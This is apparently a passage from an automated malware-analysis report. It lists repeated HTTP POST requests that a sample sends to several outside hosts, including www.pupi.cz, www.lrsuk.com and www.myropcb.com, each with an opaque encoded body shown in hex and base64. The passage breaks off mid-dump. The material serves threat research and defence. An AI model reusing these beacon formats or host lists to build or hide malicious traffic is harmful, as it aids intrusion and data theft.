34 39 57 4c 43 73 77 44 4d 4e 61 76 50 61 42 6e 79 58 4b 58 39 56 30 30 2f 54 34 34 36 36 32 52 44 73 62 75 79 2b 73 47 65 49 59 32 39 2f 4c 6c 42 61 55 6f 6a 39 78 61 30 61 57 4c 6b 47 6b 63 32 66 4d 7a 35 2b 53 53 58 4f 39 6d 6a 61 6d 61 48 66 4f 58 77 50 59 55 6c 54 74 66 34 52 46 75 54 66 53 50 38 77 43 4e 53 45 67 31 2b 77 35 7a 75 2f 66 74 7a 74 44 65 36 55 56 62 57 38 76 58 4d 77 50 32 52 6c 4a 75 53 46 44 6a 7a 39 69 4d 45 41 36 5a 4c 69 47 4d 64 47 55 68 44 65 59 71 47 44 32 41 49 68 43 73 4b 44 36 70 49 32 4b 58 49 6a 7a 44 67 63 59 39 63 72 45 53 72 43 38 53 38 38 6f 45 63 46 54 72 73 4f 71 67 30 58 73 72 50 68 65 73 31 4f 45 2b 54 2b 68 75 49 2f 43 4f 77 69 53 41 64 46 38 47 5a 78 38 47 6d 55 47 41 39 78 37 35 55 55 43 43 52 57 39 72 68 59 46 4c 2f 37 66 46 68 59 53 4e 7a 44 4f 6a 39 4d 47 35 59 57 6c 59 62 50 4d 3d Data Ascii: abjdlkAJ3MZhS0VwE+uK6HNG5WcosXqLdPQzeR2YitR+509c1nPfzSAYVVrK4jSgye4cslpeEnYkdwtNa+viquVJo8fr71MX0tu8pxXCrcPtJfew1BXpU9eOtLis1nGz7XREkxZn0dvfGtZM0EbVQL67kDHBLpHmfRMSS3atWSJ9jkXCDb/KmBlPtuGukz5+Jh2RSJhAJBGtJn9LTsTs7wU7KZBqs1mzWLyy5sQ6Nh2UZfvdI2rYZUBlnJ4DWZUt/0uEy1BJ9iVZrxd2i1F049WLCswDMNavPaBnyXKX9V00/T44662RDsbuy+sGeIY29/LlBaUoj9xa0aWLkGkc2fMz5+SSXO9mjamaHfOXwPYUlTtf4RFuTfSP8wCNSEg1+w5zu/ftztDe6UVbW8vXMwP2RlJuSFDjz9iMEA6ZLiGMdGUhDeYqGD2AIhCsKD6pI2KXIjzDgcY9crESrC8S88oEcFTrsOqg0XsrPhes1OE+T+huI/COwiSAdF8GZx8GmUGA9x75UUCCRW9rhYFL/7fFhYSNzDOj9MG5YWlYbPM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheData Raw: 71 6b 48 35 48 43 4a 6b 34 4d 62 58 6c 38 58 48 6c 5a 55 4c 68 61 56 35 33 69 71 79 2b 67 49 69 64 68 78 2b 55 50 52 4c 6b 58 51 71 5a 6b 4f 32 45 35 45 59 68 47 61 73 36 71 6d 50 63 6f 6d 68 36 33 35 70 44 49 32 70 77 67 5a 6e 2f 77 39 49 46 63 31 78 44 42 6e 48 56 47 77 77 4f 58 56 71 31 2f 54 6f 75 33 62 6b 68 52 58 66 4f 56 64 4d 31 76 77 65 78 62 44 56 46 76 48 2b 44 54 72 65 7a 4c 43 42 34 36 4d 6c 55 6b 61 57 45 6d 43 72 67 37 45 33 2b 59 59 6f 55 37 52 67 4d 38 67 63 6f 5a 39 4a 53 55 55 7a 53 56 66 76 47 68 55 46 4f 38 44 46 67 6d 4e 72 79 52 2b 62 6b 4c 75 37 67 34 45 33 79 48 61 6a 73 7a 58 53 6d 34 66 4d 7a 46 62 6e 65 63 79 46 51 6b 59 7a 4d 4c 71 31 56 75 64 48 30 38 57 39 77 67 72 56 35 34 68 46 67 69 45 5a 41 42 66 44 59 57 62 63 4f 78 73 31 4b 66 35 71 61 51 78 4d 57 72 54 57 72 71 50 4d 49 46 46 44 77 4a 61 69 50 4e 52 49 41 69 6a 76 64 51 6f 5a 52 31 41 62 4d 73 79 6a 52 6b 36 42 39 4c 38 6f 4b 72 4c 72 38 59 6f 6f 38 34 32 34 61 58 7a 68 4b 53 57 48 6c 49 43 54 77 66 48 37 44 4f 64 34 4e 5a 42 50 68 70 2b 37 4a 71 6c 49 6e 44 4e 7a 59 48 36 45 2b 61 65 32 4a 52 51 4f 63 41 64 58 67 48 33 41 51 52 34 69 4c 34 35 74 54 36 63 52 64 39 47 6b 45 5a 67 2b 36 7a 57 45 4e 66 51 2b 70 56 4d 68 65 46 4b 67 4e 54 7a 2b 64 58 4b 42 68 6a 76 6e 44 64 51 6f 30 7a 53 52 47 2b 79 69 46 64 31 52 76 47 6c 4e 73 62 6e 73 63 35 6c 34 76 4f 74 33 4f 43 45 55 42 68 7a 42 48 75 30 49 4b 70 76 62 45 6a 4e 71 32 66 2b 2b 6c 54 6f 57 44 49 64 38 36 48 58 67 75 65 39 50 4f 66 32 6e 46 2f 4b 70 32 56 78 37 73 62 34 78 37 48 4b 65 35 43 67 6c 74 58 4a 6c 44 56 38 79 34 33 50 33 58 67 65 53 50 59 77 3d Data Ascii: qkH5HCJk4MbXl8XHlZULhaV53iqy+gIidhx+UPRLkXQqZkO2E5EYhGas6qmPcomh635pDI2pwgZn/w9IFc1xDBnHVGwwOXVq1/Tou3bkhRXfOVdM1vwexbDVFvH+DTrezLCB46MlUkaWEmCrg7E3+YYoU7RgM8gcoZ9JSUUzSVfvGhUFO8DFgmNryR+bkLu7g4E3yHajszXSm4fMzFbnecyFQkYzMLq1VudH08W9wgrV54hFgiEZABfDYWbcOxs1Kf5qaQxMWrTWrqPMIFFDwJaiPNRIAijvdQoZR1AbMsyjRk6B9L8oKrLr8Yoo8424aXzhKSWHlICTwfH7DOd4NZBPhp+7JqlInDNzYH6E+ae2JRQOcAdXgH3AQR4iL45tT6cRd9GkEZg+6zWENfQ+pVMheFKgNTz+dXKBhjvnDdQo0zSRG+yiFd1RvGlNsbnsc5l4vOt3OCEUBhzBHu0IKpvbEjNq2f++lToWDId86HXgue9POf2nF/Kp2Vx7sb4x7HKe5CgltXJlDV8y43P3XgeSPYw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 61 62 6a 64 6c 6b 41 4a 33 4d 5a 68 53 30 56 77 45 2b 75 4b 36 48 4e 47 35 57 63 6f 73 58 71 4c 64 50 51 7a 65 52 32 59 69 74 52 2b 35 30 39 63 31 6e 50 66 7a 53 41 59 56 56 72 4b 34 6a 53 67 79 65 34 63 73 6c 70 65 45 6e 59 6b 64 77 74 4e 61 2b 76 69 71 75 56 4a 6f 38 66 72 37 31 4d 58 30 74 75 38 70 78 58 43 72 63 50 74 4a 66 65 77 31 42 58 70 55 39 65 4f 74 4c 69 73 31 6e 47 7a 37 58 52 45 6b 78 5a 6e 30 64 76 66 47 74 5a 4d 30 45 62 56 51 4c 36 37 6b 44 48 42 4c 70 48 6d 66 52 4d 53 53 33 61 74 57 53 4a 39 6a 6b 58 43 44 62 2f 4b 6d 42 6c 50 74 75 47 75 6b 7a 35 2b 4a 68 32 52 53 4a 68 41 4a 42 47 74 4a 6e 39 4c 54 73 54 73 37 77 55 37 4b 5a 42 71 73 31 6d 7a 57 4c 79 79 35 73 51 36 4e 68 32 55 5a 66 76 64 49 32 72 59 5a 55 42 6c 6e 4a 34 44 57 5a 55 74 2f 30 75 45 79 31 42 4a 39 69 56 5a 72 78 64 32 69 31 46 30 34 39 57 4c 43 73 77 44 4d 4e 61 76 50 61 42 6e 79 58 4b 58 39 56 30 30 2f 54 34 34 36 36 32 52 44 73 62 75 79 2b 73 47 65 49 59 32 39 2f 4c 6c 42 61 55 6f 6a 39 78 61 30 61 57 4c 6b 47 6b 63 32 66 4d 7a 35 2b 53 53 58 4f 39 6d 6a 61 6d 61 48 66 4f 58 77 50 59 55 6c 54 74 66 34 52 46 75 54 66 53 50 38 77 43 4e 53 45 67 31 2b 77 35 7a 75 2f 66 74 7a 74 44 65 36 55 56 62 57 38 76 58 4d 77 50 32 52 6c 4a 75 53 46 44 6a 7a 39 69 4d 45 41 36 5a 4c 69 47 4d 64 47 55 68 44 65 59 71 47 44 32 41 49 68 43 73 4b 44 36 70 49 32 4b 58 49 6a 7a 44 67 63 59 39 63 72 45 53 72 43 38 53 38 38 6f 45 63 46 54 72 73 4f 71 67 30 58 73 72 50 68 65 73 31 4f 45 2b 54 2b 68 75 49 2f 43 4f 77 69 53 41 64 46 38 47 5a 78 38 47 6d 55 47 41 39 78 37 35 55 55 43 43 52 57 39 72 68 59 46 4c 2f 37 66 46 68 59 53 4e 7a 44 4f 6a 39 4d 47 35 59 57 6c 59 62 50 4d 3d Data Ascii: abjdlkAJ3MZhS0VwE+uK6HNG5WcosXqLdPQzeR2YitR+509c1nPfzSAYVVrK4jSgye4cslpeEnYkdwtNa+viquVJo8fr71MX0tu8pxXCrcPtJfew1BXpU9eOtLis1nGz7XREkxZn0dvfGtZM0EbVQL67kDHBLpHmfRMSS3atWSJ9jkXCDb/KmBlPtuGukz5+Jh2RSJhAJBGtJn9LTsTs7wU7KZBqs1mzWLyy5sQ6Nh2UZfvdI2rYZUBlnJ4DWZUt/0uEy1BJ9iVZrxd2i1F049WLCswDMNavPaBnyXKX9V00/T44662RDsbuy+sGeIY29/LlBaUoj9xa0aWLkGkc2fMz5+SSXO9mjamaHfOXwPYUlTtf4RFuTfSP8wCNSEg1+w5zu/ftztDe6UVbW8vXMwP2RlJuSFDjz9iMEA6ZLiGMdGUhDeYqGD2AIhCsKD6pI2KXIjzDgcY9crESrC8S88oEcFTrsOqg0XsrPhes1OE+T+huI/COwiSAdF8GZx8GmUGA9x75UUCCRW9rhYFL/7fFhYSNzDOj9MG5YWlYbPM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 31 30 4c 67 62 6b 64 64 36 38 61 38 37 75 4f 48 64 76 6c 37 4f 52 42 44 76 76 59 39 62 36 37 73 61 35 30 44 54 58 4b 4f 65 43 4d 42 73 4b 35 47 65 44 6b 46 73 5a 41 69 6b 4d 43 2b 42 74 35 78 50 4a 71 4a 58 4e 78 30 4c 2b 31 45 4a 7a 6a 37 75 4e 53 68 72 6d 71 6e 51 6c 52 4d 72 41 6e 67 38 33 76 5a 79 62 54 47 61 4f 67 59 4d 50 4a 35 71 6b 5a 5a 6f 71 67 74 34 33 36 51 6c 6b 77 34 71 69 63 6f 47 6d 59 74 44 79 33 70 65 64 31 55 74 59 55 70 56 67 63 32 54 6e 34 56 73 64 4c 42 42 46 51 5a 53 4d 64 56 32 64 6b 41 4d 68 66 49 5a 6e 54 79 76 63 62 7a 2b 54 54 71 39 61 55 43 76 68 45 48 32 4a 6d 72 42 75 56 6f 6f 45 4a 56 45 68 41 75 77 6c 67 48 6a 4b 76 6a 42 7a 56 4b 4a 4d 76 46 65 74 53 68 4d 69 77 68 78 66 68 6c 49 78 33 49 62 76 53 52 75 48 46 62 43 66 57 41 38 52 63 45 47 38 75 33 33 63 79 42 71 63 45 6c 46 42 31 73 75 34 73 42 79 71 30 46 59 57 65 73 53 55 53 44 79 44 6e 36 71 56 47 6a 70 4f 46 4a 70 63 79 59 2f 51 34 78 71 2f 42 6f 6d 58 33 41 50 61 69 38 69 67 61 4c 72 35 63 44 70 37 66 4f 48 32 47 68 53 4b 45 4f 53 5a 41 7a 54 31 2f 76 6a 57 50 58 62 43 66 74 77 37 4c 50 6e 34 6b 51 52 74 55 2f 55 47 4d 69 2b 79 37 6d 37 4f 32 62 6a 58 64 49 32 34 32 56 4c 34 47 43 37 31 32 38 31 58 50 72 72 56 6a 38 71 73 64 65 35 77 54 37 71 37 58 64 59 6f 34 65 50 4a 35 57 42 4a 4d 62 59 66 5a 63 75 42 34 32 54 71 62 2f 73 58 51 63 32 6e 70 49 75 55 30 6c 62 69 58 75 59 44 4d 52 6b 6e 49 65 67 4b 6d 34 42 4e 35 64 45 6e 43 64 43 43 39 33 48 30 36 4f 74 54 38 5a 75 62 71 52 76 30 75 6f 4c 49 4a 33 72 56 65 36 6d 71 55 56 7a 4d 77 44 66 67 5a 42 67 6d 6e 31 4b 39 76 39 76 4d 32 4b 72 43 76 35 56 76 49 62 64 6e 69 62 53 77 59 70 53 59 34 6e 32 72 75 4e 7a 38 6e 6e 44 59 6c 66 42 49 49 68 57 6d 79 48 50 51 3d 3d Data Ascii: 10Lgbkdd68a87uOHdvl7ORBDvvY9b67sa50DTXKOeCMBsK5GeDkFsZAikMC+Bt5xPJqJXNx0L+1EJzj7uNShrmqnQlRMrAng83vZybTGaOgYMPJ5qkZZoqgt436Qlkw4qicoGmYtDy3ped1UtYUpVgc2Tn4VsdLBBFQZSMdV2dkAMhfIZnTyvcbz+TTq9aUCvhEH2JmrBuVooEJVEhAuwlgHjKvjBzVKJMvFetShMiwhxfhlIx3IbvSRuHFbCfWA8RcEG8u33cyBqcElFB1su4sByq0FYWesSUSDyDn6qVGjpOFJpcyY/Q4xq/BomX3APai8igaLr5cDp7fOH2GhSKEOSZAzT1/vjWPXbCftw7LPn4kQRtU/UGMi+y7m7O2bjXdI242VL4GC71281XPrrVj8qsde5wT7q7XdYo4ePJ5WBJMbYfZcuB42Tqb/sXQc2npIuU0lbiXuYDMRknIegKm4BN5dEnCdCC93H06OtT8ZubqRv0uoLIJ3rVe6mqUVzMwDfgZBgmn1K9v9vM2KrCv5VvIbdnibSwYpSY4n2ruNz8nnDYlfBIIhWmyHPQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1694755571.4257720Data Raw: 71 6b 48 35 48 43 4a 6b 34 4d 62 58 6c 38 58 48 6c 5a 55 4c 68 61 56 35 33 69 71 79 2b 67 49 69 64 68 78 2b 55 50 52 4c 6b 58 51 71 5a 6b 4f 32 45 35 45 59 68 47 61 73 36 71 6d 50 63 6f 6d 68 36 33 35 70 44 49 32 70 77 67 5a 6e 2f 77 39 49 46 63 31 78 44 42 6e 48 56 47 77 77 4f 58 56 71 31 2f 54 6f 75 33 62 6b 68 52 58 66 4f 56 64 4d 31 76 77 65 78 62 44 56 46 76 48 2b 44 54 72 65 7a 4c 43 42 34 36 4d 6c 55 6b 61 57 45 6d 43 72 67 37 45 33 2b 59 59 6f 55 37 52 67 4d 38 67 63 6f 5a 39 4a 53 55 55 7a 53 56 66 76 47 68 55 46 4f 38 44 46 67 6d 4e 72 79 52 2b 62 6b 4c 75 37 67 34 45 33 79 48 61 6a 73 7a 58 53 6d 34 66 4d 7a 46 62 6e 65 63 79 46 51 6b 59 7a 4d 4c 71 31 56 75 64 48 30 38 57 39 77 67 72 56 35 34 68 46 67 69 45 5a 41 42 66 44 59 57 62 63 4f 78 73 31 4b 66 35 71 61 51 78 4d 57 72 54 57 72 71 50 4d 49 46 46 44 77 4a 61 69 50 4e 52 49 41 69 6a 76 64 51 6f 5a 52 31 41 62 4d 73 79 6a 52 6b 36 42 39 4c 38 6f 4b 72 4c 72 38 59 6f 6f 38 34 32 34 61 58 7a 68 4b 53 57 48 6c 49 43 54 77 66 48 37 44 4f 64 34 4e 5a 42 50 68 70 2b 37 4a 71 6c 49 6e 44 4e 7a 59 48 36 45 2b 61 65 32 4a 52 51 4f 63 41 64 58 67 48 33 41 51 52 34 69 4c 34 35 74 54 36 63 52 64 39 47 6b 45 5a 67 2b 36 7a 57 45 4e 66 51 2b 70 56 4d 68 65 46 4b 67 4e 54 7a 2b 64 58 4b 42 68 6a 76 6e 44 64 51 6f 30 7a 53 52 47 2b 79 69 46 64 31 52 76 47 6c 4e 73 62 6e 73 63 35 6c 34 76 4f 74 33 4f 43 45 55 42 68 7a 42 48 75 30 49 4b 70 76 62 45 6a 4e 71 32 66 2b 2b 6c 54 6f 57 44 49 64 38 36 48 58 67 75 65 39 50 4f 66 32 6e 46 2f 4b 70 32 56 78 37 73 62 34 78 37 48 4b 65 35 43 67 6c 74 58 4a 6c 44 56 38 79 34 33 50 33 58 67 65 53 50 59 77 3d Data Ascii: qkH5HCJk4MbXl8XHlZULhaV53iqy+gIidhx+UPRLkXQqZkO2E5EYhGas6qmPcomh635pDI2pwgZn/w9IFc1xDBnHVGwwOXVq1/Tou3bkhRXfOVdM1vwexbDVFvH+DTrezLCB46MlUkaWEmCrg7E3+YYoU7RgM8gcoZ9JSUUzSVfvGhUFO8DFgmNryR+bkLu7g4E3yHajszXSm4fMzFbnecyFQkYzMLq1VudH08W9wgrV54hFgiEZABfDYWbcOxs1Kf5qaQxMWrTWrqPMIFFDwJaiPNRIAijvdQoZR1AbMsyjRk6B9L8oKrLr8Yoo8424aXzhKSWHlICTwfH7DOd4NZBPhp+7JqlInDNzYH6E+ae2JRQOcAdXgH3AQR4iL45tT6cRd9GkEZg+6zWENfQ+pVMheFKgNTz+dXKBhjvnDdQo0zSRG+yiFd1RvGlNsbnsc5l4vOt3OCEUBhzBHu0IKpvbEjNq2f++lToWDId86HXgue9POf2nF/Kp2Vx7sb4x7HKe5CgltXJlDV8y43P3XgeSPYw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 79 6e 72 2b 5a 76 6c 72 38 38 61 57 33 6f 4d 43 69 4b 55 68 33 35 4c 75 52 78 62 58 34 4c 4d 67 50 59 37 34 79 72 38 2b 66 63 63 48 59 56 6b 37 75 54 65 7a 4e 35 6e 4f 7a 61 74 45 37 4e 76 56 30 47 49 4b 4f 72 6c 66 6a 36 43 49 49 33 77 55 67 59 54 59 31 68 75 54 6d 47 72 49 57 68 56 54 74 4c 6b 56 56 77 6b 56 76 37 2f 73 61 30 59 34 64 61 35 6e 37 66 4a 37 78 59 41 41 37 4e 74 79 63 4a 73 37 34 69 63 31 2f 36 76 50 43 69 74 41 72 71 41 79 31 32 6f 69 53 72 79 71 65 52 58 41 52 4d 34 50 66 79 56 70 53 32 6d 75 57 38 4f 6a 6c 4a 6c 67 71 53 43 70 30 5a 54 45 56 64 49 59 42 4b 5a 50 64 44 32 47 33 56 77 4e 72 68 6e 31 62 70 65 59 38 6e 45 34 65 64 51 31 71 4c 43 4d 64 6f 7a 56 74 67 34 4d 64 73 32 48 2b 54 55 32 78 32 65 36 33 75 49 6b 38 45 41 67 68 72 78 66 4b 35 4d 48 33 30 52 38 6b 56 56 36 65 46 48 46 2f 48 69 41 62 32 4d 74 37 6f 2f 4a 75 45 79 74 35 45 6c 59 51 76 67 4a 4f 5a 4e 71 47 35 49 68 39 65 6a 54 54 58 79 79 4c 2b 51 42 63 4c 48 2b 5a 41 36 38 4e 64 72 79 58 61 43 34 50 70 74 45 34 42 75 67 4f 4e 4b 2f 58 69 41 76 54 47 51 52 6a 47 62 4f 6d 74 77 49 42 39 50 6c 62 39 4e 62 6e 63 4a 66 7a 48 4c 53 63 51 57 66 66 79 35 69 78 50 44 34 5a 63 77 67 75 65 33 63 31 70 37 74 47 39 54 2b 6d 5a 38 4c 75 72 57 31 51 57 66 31 64 6f 51 4d 34 6b 39 50 35 62 32 33 6c 68 43 50 4e 75 77 32 56 6d 4f 57 69 76 68 43 64 6f 69 68 6b 76 53 7a 52 4d 64 4d 6e 41 64 47 68 55 6c 53 65 6d 73 47 4a 34 66 75 75 4b 57 32 76 73 57 77 2f 59 6e 56 73 57 49 78 37 50 34 42 41 67 34 32 2b 65 72 6f 6f 4a 7a 4e 42 76 55 6f 77 47 46 31 6d 78 33 36 77 31 44 41 44 51 58 5a 66 6c 34 4c 6d 7a 2f 4f 6a 56 61 5a 4f 7a 43 61 74 63 4b 71 35 71 7a 5a 65 71 48 4d 61 6d 6f 66 Data Ascii: ynr+Zvlr88aW3oMCiKUh35LuRxbX4LMgPY74yr8+fccHYVk7uTezN5nOzatE7NvV0GIKOrlfj6CII3wUgYTY1huTmGrIWhVTtLkVVwkVv7/sa0Y4da5n7fJ7xYAA7NtycJs74ic1/6vPCitArqAy12oiSryqeRXARM4PfyVpS2muW8OjlJlgqSCp0ZTEVdIYBKZPdD2G3VwNrhn1bpeY8nE4edQ1qLCMdozVtg4Mds2H+TU2x2e63uIk8EAghrxfK5MH30R8kVV6eFHF/HiAb2Mt7o/JuEyt5ElYQvgJOZNqG5Ih9ejTTXyyL+QBcLH+ZA68NdryXaC4PptE4BugONK/XiAvTGQRjGbOmtwIB9Plb9NbncJfzHLScQWffy5ixPD4Zcwgue3c1p7tG9T+mZ8LurW1QWf1doQM4k9P5b23lhCPNuw2VmOWivhCdoihkvSzRMdMnAdGhUlSemsGJ4fuuKW2vsWw/YnVsWIx7P4BAg42+erooJzNBvUowGF1mx36w1DADQXZfl4Lmz/OjVaZOzCatcKq5qzZeqHMamof
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ex-olive.comCache-Control: no-cacheData Raw: 4f 53 46 61 63 69 70 36 36 38 5a 34 51 4f 77 6a 44 65 4d 71 46 2b 33 6b 32 72 64 61 33 5a 70 58 2f 73 35 76 43 56 42 2b 30 59 71 75 32 51 53 36 54 65 5a 74 7a 69 6e 54 54 73 69 49 6b 58 53 39 53 5a 51 2f 30 50 59 75 56 37 55 32 35 63 65 6f 4d 4b 45 73 63 56 30 4d 66 56 32 6e 32 48 57 62 69 4a 37 38 50 73 5a 46 65 58 6b 66 56 74 66 42 69 6c 36 6a 37 71 63 6e 49 4c 58 4a 31 50 44 72 32 2f 2b 57 44 5a 58 70 5a 50 52 57 39 43 49 4d 44 7a 53 69 55 62 34 76 4c 57 2b 36 35 32 49 47 58 39 42 79 6c 30 4b 68 7a 4f 77 69 75 34 54 68 58 4d 66 55 41 73 4e 63 77 32 77 55 58 7a 63 53 4b 2f 77 79 45 2b 5a 37 74 77 56 5a 51 35 72 54 58 4e 36 77 35 56 45 76 39 38 4b 77 46 4f 43 4e 2f 53 36 72 36 48 42 54 69 6d 73 49 2b 38 4f 42 61 34 71 44 4d 4a 4b 6e 66 6b 36 78 67 72 62 41 49 43 77 68 61 6a 7a 64 54 79 46 70 71 54 62 73 2b 39 31 31 2b 4c 50 38 33 57 4c 4d 35 6c 56 4f 58 52 58 43 38 68 50 48 59 7a 76 35 47 77 48 72 4c 4b 57 61 66 43 66 64 66 6d 77 6b 69 33 69 47 72 70 55 76 73 49 73 35 30 31 67 56 6e 4b 55 67 7a 5a 32 76 57 66 2f 68 37 69 6d 4f 43 44 75 6e 43 6b 74 48 72 79 70 7a 70 71 6b 78 42 32 69 77 52 33 6b 79 79 4f 56 6f 49 49 2f 4b 6b 6b 6e 33 72 73 63 78 4b 6b 4c 69 31 76 72 6d 4c 76 59 73 4c 61 77 77 73 2f 32 61 34 62 6a 38 41 49 6b 4e 4d 53 51 61 4a 2b 4d 57 68 77 77 68 5a 53 45 36 69 67 31 6e 5a 59 57 34 74 75 50 73 37 59 54 30 6e 44 2f 4f 4d 64 36 50 59 54 74 72 6f 42 33 41 6d 39 53 77 78 35 45 78 2f 58 76 58 6e 52 67 61 72 42 54 57 34 39 61 4f 38 74 71 64 55 50 64 71 70 5a 79 45 75 66 35 6c 74 54 54 52 76 37 30 6b 62 71 67 65 52 77 44 64 4c 33 5a 75 73 37 70 39 55 61 78 65 76 47 42 2b 62 4a 6c 30 35 50 77 4a Data Ascii: OSFacip668Z4QOwjDeMqF+3k2rda3ZpX/s5vCVB+0Yqu2QS6TeZtzinTTsiIkXS9SZQ/0PYuV7U25ceoMKEscV0MfV2n2HWbiJ78PsZFeXkfVtfBil6j7qcnILXJ1PDr2/+WDZXpZPRW9CIMDzSiUb4vLW+652IGX9Byl0KhzOwiu4ThXMfUAsNcw2wUXzcSK/wyE+Z7twVZQ5rTXN6w5VEv98KwFOCN/S6r6HBTimsI+8OBa4qDMJKnfk6xgrbAICwhajzdTyFpqTbs+911+LP83WLM5lVOXRXC8hPHYzv5GwHrLKWafCfdfmwki3iGrpUvsIs501gVnKUgzZ2vWf/h7imOCDunCktHrypzpqkxB2iwR3kyyOVoII/Kkkn3rscxKkLi1vrmLvYsLawws/2a4bj8AIkNMSQaJ+MWhwwhZSE6ig1nZYW4tuPs7YT0nD/OMd6PYTtroB3Am9Swx5Ex/XvXnRgarBTW49aO8tqdUPdqpZyEuf5ltTTRv70kbqgeRwDdL3Zus7p9UaxevGB+bJl05PwJ
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 79 6e 72 2b 5a 76 6c 72 38 38 61 57 33 6f 4d 43 69 4b 55 68 33 35 4c 75 52 78 62 58 34 4c 4d 67 50 59 37 34 79 72 38 2b 66 63 63 48 59 56 6b 37 75 54 65 7a 4e 35 6e 4f 7a 61 74 45 37 4e 76 56 30 47 49 4b 4f 72 6c 66 6a 36 43 49 49 33 77 55 67 59 54 59 31 68 75 54 6d 47 72 49 57 68 56 54 74 4c 6b 56 56 77 6b 56 76 37 2f 73 61 30 59 34 64 61 35 6e 37 66 4a 37 78 59 41 41 37 4e 74 79 63 4a 73 37 34 69 63 31 2f 36 76 50 43 69 74 41 72 71 41 79 31 32 6f 69 53 72 79 71 65 52 58 41 52 4d 34 50 66 79 56 70 53 32 6d 75 57 38 4f 6a 6c 4a 6c 67 71 53 43 70 30 5a 54 45 56 64 49 59 42 4b 5a 50 64 44 32 47 33 56 77 4e 72 68 6e 31 62 70 65 59 38 6e 45 34 65 64 51 31 71 4c 43 4d 64 6f 7a 56 74 67 34 4d 64 73 32 48 2b 54 55 32 78 32 65 36 33 75 49 6b 38 45 41 67 68 72 78 66 4b 35 4d 48 33 30 52 38 6b 56 56 36 65 46 48 46 2f 48 69 41 62 32 4d 74 37 6f 2f 4a 75 45 79 74 35 45 6c 59 51 76 67 4a 4f 5a 4e 71 47 35 49 68 39 65 6a 54 54 58 79 79 4c 2b 51 42 63 4c 48 2b 5a 41 36 38 4e 64 72 79 58 61 43 34 50 70 74 45 34 42 75 67 4f 4e 4b 2f 58 69 41 76 54 47 51 52 6a 47 62 4f 6d 74 77 49 42 39 50 6c 62 39 4e 62 6e 63 4a 66 7a 48 4c 53 63 51 57 66 66 79 35 69 78 50 44 34 5a 63 77 67 75 65 33 63 31 70 37 74 47 39 54 2b 6d 5a 38 4c 75 72 57 31 51 57 66 31 64 6f 51 4d 34 6b 39 50 35 62 32 33 6c 68 43 50 4e 75 77 32 56 6d 4f 57 69 76 68 43 64 6f 69 68 6b 76 53 7a 52 4d 64 4d 6e 41 64 47 68 55 6c 53 65 6d 73 47 4a 34 66 75 75 4b 57 32 76 73 57 77 2f 59 6e 56 73 57 49 78 37 50 34 42 41 67 34 32 2b 65 72 6f 6f 4a 7a 4e 42 76 55 6f 77 47 46 31 6d 78 33 36 77 31 44 41 44 51 58 5a 66 6c 34 4c 6d 7a 2f 4f 6a 56 61 5a 4f 7a 43 61 74 63 4b 71 35 71 7a 5a 65 71 48 4d 61 6d 6f 66 Data Ascii: ynr+Zvlr88aW3oMCiKUh35LuRxbX4LMgPY74yr8+fccHYVk7uTezN5nOzatE7NvV0GIKOrlfj6CII3wUgYTY1huTmGrIWhVTtLkVVwkVv7/sa0Y4da5n7fJ7xYAA7NtycJs74ic1/6vPCitArqAy12oiSryqeRXARM4PfyVpS2muW8OjlJlgqSCp0ZTEVdIYBKZPdD2G3VwNrhn1bpeY8nE4edQ1qLCMdozVtg4Mds2H+TU2x2e63uIk8EAghrxfK5MH30R8kVV6eFHF/HiAb2Mt7o/JuEyt5ElYQvgJOZNqG5Ih9ejTTXyyL+QBcLH+ZA68NdryXaC4PptE4BugONK/XiAvTGQRjGbOmtwIB9Plb9NbncJfzHLScQWffy5ixPD4Zcwgue3c1p7tG9T+mZ8LurW1QWf1doQM4k9P5b23lhCPNuw2VmOWivhCdoihkvSzRMdMnAdGhUlSemsGJ4fuuKW2vsWw/YnVsWIx7P4BAg42+erooJzNBvUowGF1mx36w1DADQXZfl4Lmz/OjVaZOzCatcKq5qzZeqHMamof
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 44 73 63 56 47 66 2f 55 43 63 64 5a 69 76 7a 79 33 6c 36 7a 44 34 68 72 49 62 5a 56 6a 59 34 61 6f 37 52 45 36 6a 57 57 6c 6c 32 48 75 53 5a 43 43 37 72 6f 56 4e 5a 59 65 64 31 6e 63 4d 44 6e 4a 58 46 58 66 4e 4a 71 55 34 4a 34 49 2f 4a 56 6d 2b 6d 41 6f 72 77 4d 58 6e 46 51 65 35 72 63 4d 4f 33 56 36 6f 55 4a 75 41 72 6e 38 63 4d 66 48 5a 53 36 62 33 7a 78 2f 6b 63 6b 51 41 34 61 64 7a 35 65 59 58 61 74 76 6c 79 59 45 51 48 73 46 31 33 39 62 